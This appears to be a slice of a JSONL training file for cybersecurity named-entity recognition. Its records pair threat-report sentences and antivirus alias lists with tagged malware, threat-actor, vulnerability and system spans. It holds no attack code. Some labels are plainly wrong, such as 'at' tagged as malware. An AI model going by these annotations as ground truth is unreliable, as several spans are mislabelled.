TrojanDropper.StartPage.ty Trojan[Downloader]/Win32.VB Trojan.Buzy.114 Trojan.Win32.Alien.bnu Trojan:Win32/Favadd.C Trojan/Win32.StartPage.R6041 Trojan.VBRA.06132 Trojan.DL.VB!NOyJWQLVTJg Win32/Trojan.835", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004912", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader.Hegel TROJ_SHIZ.SMP6 W32/Shiz.MU TROJ_SHIZ.SMP6 Trojan.Win32.A.Downloader.53760.HN Trojan.Packed.20771 BehavesLike.Win32.Cutwail.qh W32/Shiz.FQWK-1945 TrojanDownloader:Win32/Hegel.F Trojan/Win32.ADH.R23078 W32/Shiz.NCF!tr Win32/Trojan.74e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004913", "source": "cyner2_train"}} {"text": "Android/Twitoor is a backdoor capable of downloading other malware onto an infected device. It has been active for around one month.", "spans": {"MALWARE: Android/Twitoor": [[0, 15]], "MALWARE: backdoor": [[21, 29]], "MALWARE: malware": [[59, 66]], "SYSTEM: infected device.": [[75, 91]]}, "info": {"id": "cyner2_train_004914", "source": "cyner2_train"}} {"text": "RIG exploit kit sends Ramnit payloads via VBScript CVE-2016-0189", "spans": {"MALWARE: RIG exploit kit": [[0, 15]], "MALWARE: Ramnit payloads": [[22, 37]]}, "info": {"id": "cyner2_train_004917", "source": "cyner2_train"}} {"text": "Angler began exploiting CVE-2015-3090 about two weeks after Adobe released a patch.", "spans": {"MALWARE: Angler": [[0, 6]], "VULNERABILITY: exploiting CVE-2015-3090": [[13, 37]], "ORGANIZATION: Adobe": [[60, 65]]}, "info": {"id": "cyner2_train_004919", "source": "cyner2_train"}} {"text": "So let's make a level-headed assessment of what is really out there.", "spans": {}, "info": {"id": "cyner2_train_004921", "source": "cyner2_train"}} {"text": "Three distinctive elements of BAIJIU drew and held our attention: the unusual complexity of the attack; the appropriation of web hosting service GeoCities of 1990s fame; and the use of multiple methods of obfuscation.", 
"spans": {"MALWARE: BAIJIU": [[30, 36]], "ORGANIZATION: GeoCities": [[145, 154]]}, "info": {"id": "cyner2_train_004923", "source": "cyner2_train"}} {"text": "We assume that these two elements were chosen to trick security products.", "spans": {}, "info": {"id": "cyner2_train_004924", "source": "cyner2_train"}} {"text": "The stealer is disguised as a legitimate Google Drive extension and it can monitor browsing history, capture screenshots, and inject malicious scripts to steal funds from cryptocurrency exchanges.", "spans": {"MALWARE: The stealer": [[0, 11]], "SYSTEM: legitimate Google Drive extension": [[30, 63]]}, "info": {"id": "cyner2_train_004925", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Mansabo.389120.B Win32.Trojan-Spy.Trickbot.F Trojan.Win32.Mansabo.aiu Trojan.Win32.Mansabo.evnqvj Trojan.Inject2.64433 Trojan.Mansabo.ni TR/AD.Inject.jyiec Trojan/Win32.Mansabo Trojan.Win32.Mansabo.aiu Trojan/Win32.Inject.C2278939 TScope.Trojan.VB Trojan.TrickBot Trj/GdSda.A Win32.Trojan.Mansabo.Ljab W32/Mansabo.AIU!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004926", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Exploit/W32.Pidief.6283.GLW JS/Pdfcm.AQ Exploit-PDF.sd Bloodhound.Exploit.196 EXPL_EXECOD.A Pdf.Exploit.CVE_2009_0927-1 Exploit.Win32.Pidief.bni PDF.Exploit.CVE-2009-0927.A Exploit.W32.Pidief!c Trojan-Dropper:JS/PdfDropper.A EXPL_EXECOD.A BehavesLike.PDF.Exploit.xn EXP/Pidief.arl Exploit.Win32.Pidief.bni Trojan.JS.Downloader.BEZ Exploit.Win32.Pidief.bni Win32.Exploit.Pidief.Hupr Trojan.Js.Exploit virus.pdf.pdfjs.1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004927", "source": "cyner2_train"}} {"text": "All Firefox users are urged to update to Firefox 39.0.3. 
The fix has also been shipped in Firefox ESR 38.1.1.", "spans": {"SYSTEM: Firefox users": [[4, 17]], "SYSTEM: Firefox 39.0.3.": [[41, 56]], "SYSTEM: Firefox ESR 38.1.1.": [[90, 109]]}, "info": {"id": "cyner2_train_004928", "source": "cyner2_train"}} {"text": "The malware documented in this post was predominantly 64-bit, however, there are 32-bit versions of the malware in the wild.", "spans": {"MALWARE: malware": [[4, 11], [104, 111]], "SYSTEM: 64-bit,": [[54, 61]], "SYSTEM: 32-bit versions": [[81, 96]]}, "info": {"id": "cyner2_train_004929", "source": "cyner2_train"}} {"text": "A backdoor targetting Linux also known as: TrojanXor.Linux.DDos.A Linux/DDoS-Xor.A ELF/Trojan.JWZU-2 Linux.Xorddos ELF_XORDDOS.SM Unix.Trojan.DDoS_XOR-1 HEUR:Trojan-DDoS.Linux.Xarcen.a Trojan.Unix.Xarcen.eftmox Troj.Ddos.Linux!c Linux.DDoS.Xor.4 Trojan.Xorddos.Linux.34 Linux/DDoS-Xor.A TrojanDDoS.Linux.ff LINUX/Xorddos.tmifd Trojan[DDoS]/Linux.Xarcen.a Trojan.Trojan.Linux.XorDDoS.2 Linux/Xorddos.625867 HEUR:Trojan-DDoS.Linux.Xarcen.a Trojan.Linux.XorDdos.a Trojan.Linux.DDoS ELF/DDoS.BH!tr ELF/XorDDos.A Win32/Trojan.DDoS.ee7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004932", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Tibrun Trojan/Kryptik.bwcw Trojan.Razy.D3CCE1 W32/Trojan2.ODQP Trojan.Bruterdep TROJ_TIBRUN.B Trojan-Spy.Win32.POSBrut.b Trojan.Win32.Crypt.ctwfbi Troj.W32.Crypt.csx!c Trojan.DownLoader9.55744 Trojan.Crypt.Win32.14169 TROJ_TIBRUN.B Trojan.Krypt-POS W32/Trojan.WWSD-0234 Trojan/Crypt.eom TR/Spy.13824.412 Trojan/Win32.Crypt.csx Trojan:Win32/Tibrun.A Trojan-Spy.Win32.POSBrut.b Trojan/Win32.Tibrun.C287165 Trojan.Crypt Trj/CI.A Win32/Kryptik.BWCW Win32.Trojan-spy.Posbrut.Sxxp Trojan.Crypt!ZT6l9g/i+CQ W32/BrutPOS.B!tr Win32/Trojan.2d6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004933", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9846 
Win32/Droplet.YK Trojan.NtRootKit.9406 TR/Horse.QWS Trj/CI.A W32/Malware_fam.NB Win32/RootKit.Rootkit.43e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004934", "source": "cyner2_train"}} {"text": "The infection happens in multiple stages and the dropper is very similar to many common worm that targets embedded devices from multiple architectures.", "spans": {"MALWARE: dropper": [[49, 56]], "MALWARE: worm": [[88, 92]], "SYSTEM: embedded devices": [[106, 122]], "SYSTEM: multiple architectures.": [[128, 151]]}, "info": {"id": "cyner2_train_004935", "source": "cyner2_train"}} {"text": "Yesterday, our colleagues from Symantec published their analysis of Longhorn, an advanced threat actor that can be easily compared with Regin, ProjectSauron, Equation or Duqu2 in terms of its complexity.", "spans": {"ORGANIZATION: colleagues": [[15, 25]], "ORGANIZATION: Symantec": [[31, 39]], "THREAT_ACTOR: Longhorn,": [[68, 77]], "THREAT_ACTOR: advanced threat actor": [[81, 102]], "THREAT_ACTOR: Regin, ProjectSauron, Equation": [[136, 166]], "THREAT_ACTOR: Duqu2": [[170, 175]]}, "info": {"id": "cyner2_train_004939", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Waldek.3342336 Trojan.Mauvaise.SL1 Backdoor.Trojan Trojan.Win32.Waldek.wvv Trojan.Win32.Waldek.elvbza Troj.W32.Waldek!c Trojan.Waldek.exr Trojan:Win32/Waldek.A!bit Trojan.Win32.Waldek.wvv Backdoor.Andromeda Trj/Gamarue.A Win32/Worm.5d8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004941", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Worm.AutoRun.bo W32.SillyFDC Trojan.DownLoader8.34261 Worm:Win32/Metibh.A Rootkit.Ressdt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004942", "source": "cyner2_train"}} {"text": "However the registrar NameCheap, Inc. 
covers a pool of 287.411.506 domains where at least 0.10% can be considered as potentially malicious.", "spans": {"ORGANIZATION: NameCheap, Inc.": [[22, 37]], "MALWARE: at": [[81, 83]], "MALWARE: potentially malicious.": [[117, 139]]}, "info": {"id": "cyner2_train_004945", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FakeWinlogonXIA.Trojan Trojan.Win32.Swisyn!O Trojan.Swisyn.Win32.25583 Trojan/Swisyn.alai Win32.Worm.VB.qn W32.SillyFDC Win32/SillyAutorun.EYX TROJ_SWISYN.AJ Trojan.Win32.Swisyn.alai Trojan.Win32.Vb.btqbl Trojan.Win32.Swisyn.36864.C Trojan.KillFiles.12035 TROJ_SWISYN.AJ Trojan/Swisyn.vmn Worm/Win32.WBNA.mjv Worm:Win32/Roopirs.A Trojan.Win32.Swisyn.alai Trojan/Win32.Swisyn.R2752 Trojan.VBRA.04943 Trojan.PoorVirus I-Worm.VB.NUV Win32/VB.NUV Trojan.Win32.Swisyn", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004946", "source": "cyner2_train"}} {"text": "A backdoor also known as: MemScan:Backdoor.Turkojan.BM Trojan.PWS.VKont!NjMVuhwtYR0 BKDR_TURKOJN.SMD Win32.Backdoor.Turko PUA.Packed.Themida-2 Packed.Win32.Black.a MemScan:Backdoor.Turkojan.BM Packed.Win32..Black.~A MemScan:Backdoor.Turkojan.BM Trojan.Packed.650 BKDR_TURKOJN.SMD Heuristic.BehavesLike.Win32.Fake.O Trojan:Win32/Turkojan.B!dll MemScan:Backdoor.Turkojan.BM Packed/Win32.Black Trojan.Win32.Nodef.dqw Trj/Thed.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004947", "source": "cyner2_train"}} {"text": "This report analyzes a campaign of targeted attacks against an NGO working on environmental issues in Southeast Asia.", "spans": {"THREAT_ACTOR: campaign": [[23, 31]], "ORGANIZATION: NGO": [[63, 66]]}, "info": {"id": "cyner2_train_004949", "source": "cyner2_train"}} {"text": "The developers refer to this tool by the name Kazuar, which is a Trojan written using the Microsoft .NET Framework that offers actors complete access to compromised systems targeted by its operator.", "spans": {"THREAT_ACTOR: developers": [[4, 14]], 
"MALWARE: tool": [[29, 33]], "MALWARE: Kazuar,": [[46, 53]], "MALWARE: Trojan": [[65, 71]], "SYSTEM: the Microsoft .NET Framework": [[86, 114]], "THREAT_ACTOR: actors": [[127, 133]], "SYSTEM: compromised systems": [[153, 172]], "THREAT_ACTOR: operator.": [[189, 198]]}, "info": {"id": "cyner2_train_004950", "source": "cyner2_train"}} {"text": "A backdoor also known as: BackDoor-AZF.dll BKDR_BITS.B W32/Backdoor.FPJ Backdoor.Trojan Win32/Bits.A BKDR_BITS.B Backdoor.Win32.Bits Trojan.Win32.Bits.dlhcqc Backdoor.Win32.Bits.A BackDoor.Bits Backdoor.Bits.Win32.9 BackDoor-AZF.dll W32/Backdoor.SUAV-1947 Backdoor/Bits.b Backdoor:Win32/Bits.B Backdoor.Win32.Bits Bck/Bits.A Backdoor.Bits!2M7xWD4MAec", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004951", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.B13C Trojan.Blouiroet Trojan.Win32.Blouiroet.au Trojan.Win32.Blouiroet.evaxpp Trojan.Win32.Z.Symmi.3033600 Troj.W32.Blouiroet!c Win32.Trojan.Blouiroet.Wvkk BehavesLike.Win32.Trojan.vc Trojan.Blouiroet.s Trojan.Symmi.D1371C Trojan.Win32.Blouiroet.au Trojan:Win32/Blouiroet.A Trojan/Win32.Blouiroet.C2267836 Trojan.Blouiroet Trj/CI.A Win32/Trojan.c10", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004953", "source": "cyner2_train"}} {"text": "From a single instance of the encoded JavaScript discovered in one version of this malware, we pivoted on the Command and Control C2 IPv4 address discovered during static analysis and deobfuscation, using our Threat Intelligence Service AutoFocus, unearthed many more versions of the malware and found that the versions seen to date were delivering a credential-stealing Trojan as the final payload.", "spans": {"MALWARE: malware,": [[83, 91]], "SYSTEM: Threat Intelligence Service AutoFocus,": [[209, 247]], "MALWARE: malware": [[284, 291]], "MALWARE: a credential-stealing Trojan": [[349, 377]], "MALWARE: the final payload.": [[381, 399]]}, "info": {"id": 
"cyner2_train_004954", "source": "cyner2_train"}} {"text": "A backdoor also known as: VirTool.VBInject Trojan.Win32.Clicker!BT Trojan.Kazy.D6D077 Win32.Trojan.Trojan-Clicker.e Trojan.Win32.VB.dwztex Trojan.Win32.Z.Kazy.28676 Win32.HLLW.VBNA.based BehavesLike.Win32.Trojan.mz Trojan.Win32.TrojanClicker TrojanClicker.VB.fwe TR/Kazy.446583.222 TrojanClicker:Win32/Wimg.A Trojan.Win32.Clicker!BT TScope.Trojan.VB Trj/GdSda.A W32/TrojanClicker.OFQ!tr Win32/Trojan.de7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004956", "source": "cyner2_train"}} {"text": "These attacks are targeted, but not spear-phished.", "spans": {}, "info": {"id": "cyner2_train_004962", "source": "cyner2_train"}} {"text": "CVE-2017-0199 was originally a zero-day remote code execution vulnerability that allowed attackers to exploit a flaw that exists in the Windows Object Linking and Embedding OLE interface of Microsoft Office to deliver malware.", "spans": {"VULNERABILITY: zero-day remote code execution vulnerability that": [[31, 80]], "THREAT_ACTOR: attackers": [[89, 98]], "MALWARE: exploit": [[102, 109]], "MALWARE: the Windows Object Linking and Embedding OLE": [[132, 176]], "SYSTEM: Microsoft Office": [[190, 206]], "MALWARE: malware.": [[218, 226]]}, "info": {"id": "cyner2_train_004963", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Triosir.682 Backdoor:Win32/Rupski.A Trojan.Triosir! 
AdWare.AddLyrics Win32/Virus.Adware.cd5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004967", "source": "cyner2_train"}} {"text": "A backdoor also known as: HackTool.Win32.Injecter", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004970", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojanpws.Ginapass Trojan.Win32.Figina.ewevus Trojan.PWS.Figina Tool.DYAMAR.Win32.193 BehavesLike.Win32.Ransom.bc PWS:Win32/GinaPass.D Downloader.Delphi Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004973", "source": "cyner2_train"}} {"text": "Bitdefender Labs has issued a technical advisory to warn the public about a new wave of opportunistic attacks using a vulnerability in Zoho ManageEngine servers, which could affect tens of thousands of businesses.", "spans": {"ORGANIZATION: Bitdefender Labs": [[0, 16]], "ORGANIZATION: technical advisory": [[30, 48]], "VULNERABILITY: vulnerability": [[118, 131]], "SYSTEM: Zoho ManageEngine servers,": [[135, 161]], "ORGANIZATION: businesses.": [[202, 213]]}, "info": {"id": "cyner2_train_004976", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Clicker!BT Win32.Trojan.WisdomEyes.16070401.9500.9503 Uds.Dangerousobject.Multi!c trojanclicker.msil.fakeie.a TR/Dropper.MSIL.138467 Trojan.MSIL.Krypt.2 TrojanClicker:MSIL/FakeIE.A Trojan.Win32.Clicker!BT Downloader.MSIL.ASXS Win32/Trojan.d60", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004977", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Worm.Fujacks.AB Packed.Win32.TDSS!O W32/Fujacks.s Worm.Fujack.Win32.6 W32/Fujacks.aa.2 PE_FUJACKS.EA Win32.Worm.BMW.b W32/Fujack.R W32.Fujacks.E Win32/Emerleox.CO PE_FUJACKS.EA Win.Worm.Fujack-8 Worm.Win32.Fujack.aa Win32.Worm.Fujacks.AB Trojan.Win32.Fujack.nsvf W32.W.Fujack.kZ4V Virus.Win32.Viking.a Win32.Worm.Fujacks.AB Win32.HLLP.Whboy.80 BehavesLike.Win32.MultiPlug.th W32/Fujack.R 
Worm/Viking.Tail TR/Drop.Hupigon.kmx Trojan[Packed]/Win32.CPEX-based Win32.WhBoy.aa.183492 Trojan:WinNT/Kangkio.A Win32.Worm.Fujacks.AB Win32.WhBoy.AJ Worm.Win32.Fujack.aa Win32.Virus.Neshta.D Win32/Dellboy.Z Win32.Worm.Fujacks.AB Win32.HLLW.Whboy RiskWare.Tool.CK Win32.Fujacks.AD Win32/Fujacks.AD Win32.HLLP.WHBoy.AP Worm.Win32.Fujack W32/BoyhW.V Virus.Win32.Viking.LB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004978", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Heur.E05F81 Win32.HLLW.Autoruner2.27649 BehavesLike.Win32.Fake.dc Worm:Win32/Namepuk.A HEUR/Fakon.mwf Trojan.FKM!1pKOHJnJsdU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004979", "source": "cyner2_train"}} {"text": "Open source reporting recently indicated new activity from the Iranian actor publicly known as Greenbug targeting Saudi Arabia.", "spans": {"THREAT_ACTOR: the Iranian actor": [[59, 76]], "THREAT_ACTOR: Greenbug": [[95, 103]]}, "info": {"id": "cyner2_train_004980", "source": "cyner2_train"}} {"text": "Following on from our post on Angler EK we are going to expose the mechanics behind the Bedep ad-fraud malware.", "spans": {"MALWARE: Angler EK": [[30, 39]], "MALWARE: Bedep ad-fraud malware.": [[88, 111]]}, "info": {"id": "cyner2_train_004981", "source": "cyner2_train"}} {"text": "The exploit files involved were identical to the Hacking Team's leaked exploit HTML, JavaScript, and ShockWave Flash 0-day files.", "spans": {"MALWARE: exploit": [[4, 11], [71, 78]], "ORGANIZATION: Hacking Team's": [[49, 63]]}, "info": {"id": "cyner2_train_004982", "source": "cyner2_train"}} {"text": "Since then we have identified a number of attacks over a two-year period, beginning in April 2014, which we attribute to Suckfly.", "spans": {"THREAT_ACTOR: Suckfly.": [[121, 129]]}, "info": {"id": "cyner2_train_004983", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32.Koutodoor!O Trojan.Koutodoor.E 
Win32.Rootkit.Koutodoor.a Trojan.Koutodoor TROJ_DLOADR.SMOM Backdoor.Win32.Koutodoor.aihc Trojan.Win32.RKDoor.evaszd Backdoor.Win32.Koutodoor.HC Trojan.DownLoader3.76 Trojan.Koutodoor.Win32.5401 TROJ_DLOADR.SMOM Trojan.Rootkit.Pakes W32.Backdoor.Koutodoor Trojan[Backdoor]/Win32.Koutodoor Win32.Troj.JunkcodeT.a.188672 Trojan.Koutodoor.12 Backdoor.Win32.Koutodoor.aihc TrojanDropper:Win32/Minmal.A Backdoor/Win32.Koutodoor.R1785 Trojan.PSW.Win32.OnlineGame.d Trojan.Win32.Koutodoor.AN", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004984", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exploit.MSIL Exploit.Win32.CVE20130074.eupinx W32/Trojan.QBBK-0155 Exploit.MSIL.cn EXP/CVE-2013-0074.cpsmi Exploit:MSIL/CVE-2016-0034.B Trj/GdSda.A Trojan.Win32.Exploit W32/CVE_2013_0074.GW!tr Win32/Trojan.Exploit.d89", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004985", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanSpy.VBChuchelo.bk Trojan/Spy.VBChuchelo.g Trojan-Spy.Win32.VBChuchelo TrojanSpy.VBChuchelo.G Win32/Spy.KeyLogger.NDE Trojan-Downloader.Win32.Noesis.11.B!IK W32/VBTroj.WTX Trojan.VB-7191 Trojan-Spy.Win32.VBChuchelo.g Backdoor.VB.1 TrojWare.Win32.TrojanSpy.VB.~FJ Trojan-Spy.Win32.VBChuchelo.g TrojanSpy.VBChuchelo.v Backdoor.Trojan Backdoor:Win32/Zumamumy.A Trojan.Win32.VBChuchelo.106667 Backdoor.VB.1 Win-Trojan/Vbchuchelo.106658 Trojan-Spy.Win32.VBChuchelo.g Trojan-Downloader.Win32.Noesis.11.B Dropper.Tiny Trj/Downloader.MDW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004988", "source": "cyner2_train"}} {"text": "The bulk of the victims were predominantly based out of Ecuador, Venezuela, Peru, Argentina, and Columbia; however, other victims were identified in Korea, the United States, the Dominican Republic, Cuba, Bolivia, Guatemala, Nicaragua, Mexico, England, Canada, Germany, Russia, and Ukraine.", "spans": {"ORGANIZATION: victims": [[16, 23], [122, 
129]]}, "info": {"id": "cyner2_train_004990", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDropper.Yabinder.2.0 Trojan.DR.Yabinder!OrBzj5WtPwc Win32/Yabinder.20 W32/Yabinder.C W32.Slackor.dr Slacke.A TROJ_YABINDER.20 Trojan.Yabinder.20B TrojanDropper.Yabinder.2.0 TrojWare.Win32.Yabinder.20 TrojanDropper.Yabinder.2.0 Trojan.MulDrop.310 TR/Yabinder.20.B TROJ_YABINDER.20 Win32/TrojanRunner.Yab.200 W32/Yabinder.C TrojanDropper:Win32/Yabinder.2_0 Backdoor.Win32.Bifrose.168361 TrojanDropper.Yabinder.2.0 Dropper/Yabinder.9728 Backdoor.Win32.Bifrose.bco Malware.Slackor Trojan.Yabinder.a Trojan-Dropper.Win32.Yabinder.20 W32/Yabinder.C!tr Dropper.Yabinder.A Trj/Yabinder.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004991", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom_YUHAK.A Trojan.MulDrop7.49600 Ransom_YUHAK.A BehavesLike.Win32.PWSZbot.dh TR/RedCap.cgaww Trojan.Heur.RP.E93A3E Ransom:Win32/Wagcrypt.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004992", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE BehavesLike.Win32.Trojan.cc Trojan[Dropper]/Win32.Gluer TrojanDropper:Win32/Gluer.dam#2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004995", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.DOS.Filemaker.A Trojan.DOS.Filemaker.A Filemaker.b Trojan.DOS.Filemaker Trojan.DOS.Filemaker.A TrojWare.DOS.Filemaker Trojan.DOS.Filemaker.A Trojan.Filemaker TR/Filemaker.A Filemaker.b Trojan/DOS.DOS Trojan.DOS.Filemaker.A Filemaker.A Trojan.DOS.Filemaker Malware_fam.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004996", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9985 W32/Trojan2.OWYQ Trojan.Msil W32/Trojan.FRCA-1486 Trojan.Spacekito Trojan.Zusy.D177A1 Trojan:MSIL/Spacekito.E PUP/Win32.Vittalia.R124797 Trj/CI.A", 
"spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004997", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.DownLoader25.42759 BehavesLike.Win32.BadFile.gh", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004998", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Banker.Win32.82933 Win32.Trojan.WisdomEyes.16070401.9500.9712 Trojan.Zbot Trojan-Spy.MSIL.Banker.jc Trojan.Win32.Banker.datvyw Troj.Spy.MSIL.Banker.jc!c Trojan-Spy.MSIL.CliBanker TR/Spy.Clipug.A.11 Win32.Troj.Banker.kcloud TrojanSpy:MSIL/Clipug.A Trojan.Kazy.D5F205 Trojan-Spy.MSIL.Banker.jc Trojan/Win32.ClipBanker.C415793 Trj/Dtcontx.M Msil.Trojan-spy.Banker.Ecua Trojan.ClipBanker! MSIL/ClipBanker.A!tr Win32/Trojan.Spy.b4a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004999", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.AutoRun Worm.W32.Autorun!c Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/MalwareF.OZHN Worm.Win32.AutoRun.bhzt Trojan.Win32.DownLoad2.dfarbo Win32.Worm.Autorun.Wvuf Trojan.DownLoad2.11039 Trojan.Patched.Win32.123715 BehavesLike.Win32.Downloader.nt W32/Risk.AVZF-7617 Worm/AutoRun.yjm Trojan.Graftor.D1B4A5 Worm.Win32.AutoRun.bhzt Worm/Win32.AutoRun.C2342249 Trojan.Meredrop!NKOc3oKULjk Worm.Win32.AutoRun W32/AutoRun.BHZT!worm Trj/CI.A Win32/Trojan.e1e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005003", "source": "cyner2_train"}} {"text": "The report analyzed the entirety of the purported attack campaign, beginning in 2009 using a family of tools dubbed Troy'.", "spans": {"THREAT_ACTOR: attack campaign,": [[50, 66]], "MALWARE: family of tools": [[93, 108]], "MALWARE: Troy'.": [[116, 122]]}, "info": {"id": "cyner2_train_005005", "source": "cyner2_train"}} {"text": "The payload installed in attacks using this lure is a variant of the Emissary Trojan that we have analyzed in the past, which has direct links to threat actors 
associated with Operation Lotus Blossom.", "spans": {"MALWARE: payload": [[4, 11]], "MALWARE: the Emissary Trojan": [[65, 84]], "THREAT_ACTOR: threat actors": [[146, 159]], "THREAT_ACTOR: Operation Lotus Blossom.": [[176, 200]]}, "info": {"id": "cyner2_train_005006", "source": "cyner2_train"}} {"text": "A backdoor also known as: Packed.Win32.TDSS!O Nettool.Ultrasurf Trojan/AutoRun.VB.axp Win32.Trojan.WisdomEyes.16070401.9500.9864 W32/Trojan4.MDT Win.Trojan.7355760-1 TrojWare.Win32.Patched.KSU Tool.UltraSurf.Win32.14 BehavesLike.Win32.FakeAlertSecurityTool.hc W32/Trojan.VIDV-4226 Win32.Troj.Undef.kcloud Trojan.Heur.VB.KieddGFnVEmi Trojan:Win32/Cossta.A Trojan/Win32.Cossta.C77631 Trojan.Dynamer!q0c68r1YFqw W32/VB.AXP!tr Trojan.VBRA.02198 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005008", "source": "cyner2_train"}} {"text": "A backdoor targetting Linux also known as: TROJ_MINER.AUSC TROJ_MINER.AUSC JS/Coinminer.EFAB!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005013", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Bladabindi.FC.1799 Trojan.Zusy.D17364 Win32.Trojan.WisdomEyes.16070401.9500.9949 TrojWare.MSIL.Dynamer.AS Trojan.DownLoader12.58576 Trojan.Msil W32/Trojan.PPUX-1583 Trj/GdSda.A Win32/Trojan.744", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005014", "source": "cyner2_train"}} {"text": "Secondly, PowerShell can be used to steal usernames, passwords, and other system information without an executable file being present.", "spans": {"SYSTEM: PowerShell": [[10, 20]], "VULNERABILITY: can be used to steal": [[21, 41]], "VULNERABILITY: without an executable file being present.": [[93, 134]]}, "info": {"id": "cyner2_train_005016", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-PSW.Win32.YahuPass!O Worm.Zaphal Trojan/PSW.YahuPass.jo Trojan.Graftor.D3448 Win32.Trojan.Delf.ff Win.Trojan.Yahupass-1 
Trojan.Win32.Scar.oeuq Trojan.Win32.YahuPass.cthys Trojan.Win32.Z.Yahupass.575793 Trojan/PSW.YahuPass.y Trojan[PSW]/Win32.YahuPass Worm:Win32/Zaphal.B Troj.W32.Scar!c Trojan.Win32.Scar.oeuq Trojan/Win32.Losel.C65535 Trojan.Scar Win32/Spy.Delf.OPX Win32.Trojan.Scar.Alis Trojan.PWS.YahuPass!c1rtyKxFJLA Win32/Trojan.57c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005017", "source": "cyner2_train"}} {"text": "As this is not the first time that CVE-2017-0199 was exploited for an attack, we thought it fitting to analyze this new attack method to provide some insight into how this vulnerability can be abused by other campaigns in the future.", "spans": {"VULNERABILITY: CVE-2017-0199": [[35, 48]], "MALWARE: exploited for": [[53, 66]], "VULNERABILITY: vulnerability": [[172, 185]], "THREAT_ACTOR: campaigns": [[209, 218]]}, "info": {"id": "cyner2_train_005018", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Dropper.Neblso W32/Dropper.CPO Trojan.Dropper TROJ_MULTIDRP.LA Trojan-Dropper.Win32.Neblso Trojan.Win32.Neblso.dkkt Trojan.Win32.PSWLdPinch.41277 Troj.Dropper.W32.Neblso!c Trojan.MulDrop.911 Dropper.Neblso.Win32.7 TROJ_MULTIDRP.LA BehavesLike.Win32.VirRansom.pc Trojan-Dropper.Win32.Neblso W32/Risk.OJSS-0633 TrojanDropper.Ichitaro.Tarodrop.g 